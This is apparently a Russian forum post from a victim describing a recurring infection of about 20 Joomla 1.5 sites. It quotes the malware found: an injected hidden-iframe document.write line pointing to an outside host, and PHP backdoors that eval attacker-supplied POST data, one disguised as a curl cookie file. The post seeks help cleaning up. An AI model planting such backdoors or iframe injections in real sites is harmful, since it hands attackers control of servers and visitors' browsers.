Короче началось с того, что Касперский начал ругаться при просмотре сайта.
При анализе выяснилось, что все папки с доменами-сайтами заржены. Зараза каключается в добавлении ко ВСЕМ *.js дописки вида
;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://rsdlfyrn.lflinkup.net/e8ddc4f1.3HIcyxr?default"></iframe>');
при восстановлении чистых файлов с дистрибутива, практически сразу этот код появляется опять. Дата изменения файлов при этом не меняется.
Также были обнаружены файлы с разными названиями типа
.e9gwpz.php
.bhuzih.php
и т.п. (конечно всё, что нашел, удалил)
их содержимое такое:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
?>
Также встретил подозрительный файл j.php :
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
194.242.59.43 FALSE /about/ FALSE 0 <?eval(stripslashes(array_pop($_POST)))?> 1
А также ещё несколько подозрительных, которые подлиннее, начинаются они так:
<?php
/**
* @version $Id: framework.php 22381 2011-11-14 01:18:53Z dextercowley $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
// no direct access
class JToolBarHelper
{
/**
* Title cell
* For the title and toolbar to be rendered correctly,
* this title fucntion must be called before the starttable function and the toolbars icons
* this is due to the nature of how the CSS has been used to postion the title in respect to the toolbar
* @param string The title
* @param string The name of the image
* @since 1.5
*/
function title($title, $icon = 'generic.png')
{.....
Время изменения файлов не фиксируется, так что и логи затруднительно посмотреть. Обращения извне во время возобновления заражения файлов не происходит. Заражаются даже те сайты(папки), домены которых не существуют, т.е. скрипт тупо сканирует все папки аккаунта...
Хостинг jino.ru ; Joomla 1.5.26 и иногда 1.5.23 (всего штук 20 сайтов)
Для пробы перенес несколько сайтов на другой хостинг (sweb.ru) - вручную вроде всё вычистил при этом - но они тоже заразились через неделю.
23.04.2024, 10:06:10